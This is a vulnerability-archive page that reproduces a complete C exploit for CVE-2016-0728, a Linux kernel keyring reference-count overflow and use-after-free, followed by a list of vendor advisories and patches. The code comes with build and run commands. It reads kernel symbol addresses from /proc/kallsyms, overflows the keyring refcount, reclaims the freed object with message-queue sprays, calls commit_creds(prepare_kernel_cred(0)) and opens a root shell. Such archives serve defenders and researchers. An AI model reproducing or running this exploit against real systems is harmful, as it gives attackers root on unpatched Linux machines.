Lucene search
Perception Point TeamPACKETSTORM:135330HistoryJan 20, 2016 - 12:00 a.m.
Linux Kernel REFCOUNT Overflow / Use-After-Free
2016-01-2000:00:00
Perception Point Team
packetstormsecurity.com
21
0.0004 Low
EPSS
Percentile
0.4%
`# Exploit Title: Linux kernel REFCOUNT overflow/Use-After-Free in keyrings
# Date: 19/1/2016
# Exploit Author: Perception Point Team
# CVE : CVE-2016-0728
/* CVE-2016-0728 local root exploit
modified by Federico Bento to read kernel symbols from /proc/kallsyms
props to grsecurity/PaX for preventing this in so many ways
$ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall
$ ./cve_2016_072 PP_KEY */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <keyutils.h>
#include <unistd.h>
#include <time.h>
#include <unistd.h>
#include <sys/ipc.h>
#include <sys/msg.h>
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (*
_prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
#define STRUCT_LEN (0xb8 - 0x30)
#define COMMIT_CREDS_ADDR (0xffffffff810bb050)
#define PREPARE_KERNEL_CREDS_ADDR (0xffffffff810bb370)
struct key_type {
char * name;
size_t datalen;
void * vet_description;
void * preparse;
void * free_preparse;
void * instantiate;
void * update;
void * match_preparse;
void * match_free;
void * revoke;
void * destroy;
};
/* thanks spender - Federico Bento */
static unsigned long get_kernel_sym(char *name)
{
FILE *f;
unsigned long addr;
char dummy;
char sname[256];
int ret;
f = fopen("/proc/kallsyms", "r");
if (f == NULL) {
fprintf(stdout, "Unable to obtain symbol listing!\n");
exit(0);
}
ret = 0;
while(ret != EOF) {
ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
if (ret == 0) {
fscanf(f, "%s\n", sname);
continue;
}
if (!strcmp(name, sname)) {
fprintf(stdout, "[+] Resolved %s to %p\n", name, (void *)addr);
fclose(f);
return addr;
}
}
fclose(f);
return 0;
}
void userspace_revoke(void * key) {
commit_creds(prepare_kernel_cred(0));
}
int main(int argc, const char *argv[]) {
const char *keyring_name;
size_t i = 0;
unsigned long int l = 0x100000000/2;
key_serial_t serial = -1;
pid_t pid = -1;
struct key_type * my_key_type = NULL;
struct {
long mtype;
char mtext[STRUCT_LEN];
} msg = {0x4141414141414141, {0}};
int msqid;
if (argc != 2) {
puts("usage: ./keys <key_name>");
return 1;
}
printf("[+] uid=%d, euid=%d\n", getuid(), geteuid());
commit_creds = (_commit_creds)get_kernel_sym("commit_creds");
prepare_kernel_cred =
(_prepare_kernel_cred)get_kernel_sym("prepare_kernel_cred");
if(commit_creds == NULL || prepare_kernel_cred == NULL) {
commit_creds = (_commit_creds)COMMIT_CREDS_ADDR;
prepare_kernel_cred =
(_prepare_kernel_cred)PREPARE_KERNEL_CREDS_ADDR;
if(commit_creds == (_commit_creds)0xffffffff810bb050
|| prepare_kernel_cred == (_prepare_kernel_cred)0xffffffff810bb370)
puts("[-] You probably need to change the address of
commit_creds and prepare_kernel_cred in source");
}
my_key_type = malloc(sizeof(*my_key_type));
my_key_type->revoke = (void*)userspace_revoke;
memset(msg.mtext, 'A', sizeof(msg.mtext));
// key->uid
*(int*)(&msg.mtext[56]) = 0x3e8; /* geteuid() */
//key->perm
*(int*)(&msg.mtext[64]) = 0x3f3f3f3f;
//key->type
*(unsigned long *)(&msg.mtext[80]) = (unsigned long)my_key_type;
if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {
perror("msgget");
exit(1);
}
keyring_name = argv[1];
/* Set the new session keyring before we start */
serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name);
if (serial < 0) {
perror("keyctl");
return -1;
}
if (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL |
KEY_GRP_ALL | KEY_OTH_ALL) < 0) {
perror("keyctl");
return -1;
}
puts("[+] Increfing...");
for (i = 1; i < 0xfffffffd; i++) {
if (i == (0xffffffff - l)) {
l = l/2;
sleep(5);
}
if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {
perror("[-] keyctl");
return -1;
}
}
sleep(5);
/* here we are going to leak the last references to overflow */
for (i=0; i<5; ++i) {
if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {
perror("[-] keyctl");
return -1;
}
}
puts("[+] Finished increfing");
puts("[+] Forking...");
/* allocate msg struct in the kernel rewriting the freed keyring
object */
for (i=0; i<64; i++) {
pid = fork();
if (pid == -1) {
perror("[-] fork");
return -1;
}
if (pid == 0) {
sleep(2);
if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {
perror("[-] msgget");
exit(1);
}
for (i = 0; i < 64; i++) {
if (msgsnd(msqid, &msg, sizeof(msg.mtext), 0) == -1) {
perror("[-] msgsnd");
exit(1);
}
}
sleep(-1);
exit(1);
}
}
puts("[+] Finished forking");
sleep(5);
/* call userspace_revoke from kernel */
puts("[+] Caling revoke...");
if (keyctl(KEYCTL_REVOKE, KEY_SPEC_SESSION_KEYRING) == -1) {
perror("[+] keyctl_revoke");
}
printf("uid=%d, euid=%d\n", getuid(), geteuid());
execl("/bin/sh", "/bin/sh", NULL);
return 0;
}
`
Related
exploitpack
exploitpack
oraclelinux
oraclelinux
kernel security update
2016-01-25 00:00:00
kernel-uek security update
2016-01-20 00:00:00
Unbreakable Enterprise kernel security update
2016-01-20 00:00:00
symantec
symantec
SA112 : Linux Kernel Keyring Privilege Escalation
2016-02-25 08:00:00
openvas
openvas
Oracle Linux Local Check: ELSA-2016-3509
2016-01-21 00:00:00
SUSE: Security Advisory for kernel (SUSE-SU-2016:0205-1)
2016-01-23 00:00:00
Ubuntu Update for linux USN-2871-1
2016-01-20 00:00:00
nessus
nessus
Ubuntu 14.04 LTS : Linux kernel vulnerability (USN-2870-1)
2016-01-20 00:00:00
SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2016:0205-1)
2016-01-25 00:00:00
Oracle Linux 7 : kernel (ELSA-2016-0064)
2016-01-26 00:00:00
f5
f5
K01948202 : Linux kernel vulnerability CVE-2016-0728
2016-01-22 00:00:00
SOL01948202 - Linux kernel vulnerability CVE-2016-0728
2016-01-22 00:00:00
thn
thn
Zero-Day Flaw Found in 'Linux Kernel' leaves Millions Vulnerable
2016-01-19 06:30:00
suse
suse
Security update for the Linux Kernel (important)
2016-01-22 18:12:30
Security update for Kernel live patch 10 (important)
2016-02-04 19:18:40
Security update for the Linux Kernel (important)
2016-01-20 21:11:28
ubuntu
ubuntu
Linux kernel (Utopic HWE) vulnerability
2016-01-19 00:00:00
Linux kernel (Wily HWE) vulnerability
2016-01-19 00:00:00
Linux kernel (Raspberry Pi 2) vulnerability
2016-01-19 00:00:00
seebug
seebug
Linuxๅ
ๆ ธ Keyrings ๅผ็จ่ฎกๆฐๆบขๅบ UAF ๆผๆด
2016-05-20 00:00:00
ACTi E31 surveillance Cameras ๅผฑๅฏ็ ๆผๆด
2016-01-28 00:00:00
mageia
mageia
Updated kernel-linus packages fix security vulnerability
2016-01-21 09:09:50
Updated kernel packages fix security vulnerability
2016-01-21 09:09:50
Updated kernel-tmb packages fix security vulnerability
2016-01-21 09:09:50
debiancve
debiancve
CVE-2016-0728
2016-02-08 03:59:00
altlinux
altlinux
prion
prion
Integer overflow
2016-02-08 03:59:00
Design/Logic Flaw
2016-02-01 23:59:00
redhat
redhat
(RHSA-2016:0065) Important: kernel-rt security update
2016-01-25 18:47:39
(RHSA-2016:0064) Important: kernel security update
2016-01-25 18:47:36
(RHSA-2016:0103) Important: kernel security, bug fix, and enhancement update
2016-02-02 16:05:39
threatpost
threatpost
Android Devices Linux Zero Day Kernel Vulnerability
2016-01-21 11:45:56
Linux Kernel Privilege Escalation Flaw Patched
2016-01-19 07:47:18
Google Fixes Critical Mediaserver Bug, Again
2016-03-07 14:00:02
ubuntucve
ubuntucve
CVE-2016-0728
2016-01-19 00:00:00
zdt
zdt
cve
cve
CVE-2016-0728
2016-02-08 03:59:00
CVE-2016-7028
2016-02-01 23:59:00
chrome
chrome
Stable Channel Update for Chrome OS
2016-01-26 00:00:00
android
android
CVE-2016-0728
2016-03-01 00:00:00
cisa
cisa
Linux Kernel Vulnerability
2016-01-19 00:00:00
veracode
veracode
Integer Overflow
2019-05-02 05:20:50
Denial Of Service (DoS)
2019-05-02 05:20:50
Privilege Escalation
2019-05-02 05:20:50
amazon
amazon
Medium: kernel
2016-01-19 17:07:00
checkpoint_security
checkpoint_security
archlinux
archlinux
linux-lts: privilege escalation
2016-01-25 00:00:00
linux: privilege escalation
2016-01-20 00:00:00
ibm
ibm
Security Bulletin: Vulnerability in Linux Kernel affects PowerKVM (CVE-2016-0728)
2018-06-18 01:30:28
Security Bulletin: Vulnerabilities in the Linux kernel affect PowerKVM
2018-06-18 01:33:24
centos
centos
kernel, perf, python security update
2016-01-26 02:08:06
exploitdb
exploitdb
hp
hp
fedora
fedora
[SECURITY] Fedora 23 Update: kernel-4.3.3-303.fc23
2016-01-26 18:29:15
[SECURITY] Fedora 22 Update: kernel-4.3.4-200.fc22
2016-02-01 06:34:15
debian
debian
[SECURITY] [DSA 3448-1] linux security update
2016-01-19 12:40:10
[SECURITY] [DSA 3448-1] linux security update
2016-01-19 12:40:10
osv
osv
linux - security update
2016-01-19 00:00:00
kitploit
kitploit
androidsecurity
androidsecurity
Nexus Security Bulletin - March 2016
2016-03-07 00:00:00
lenovo
lenovo
AMI MegaRAC SP-X BMC Vulnerabilities - Lenovo Support US
2020-04-13 19:22:04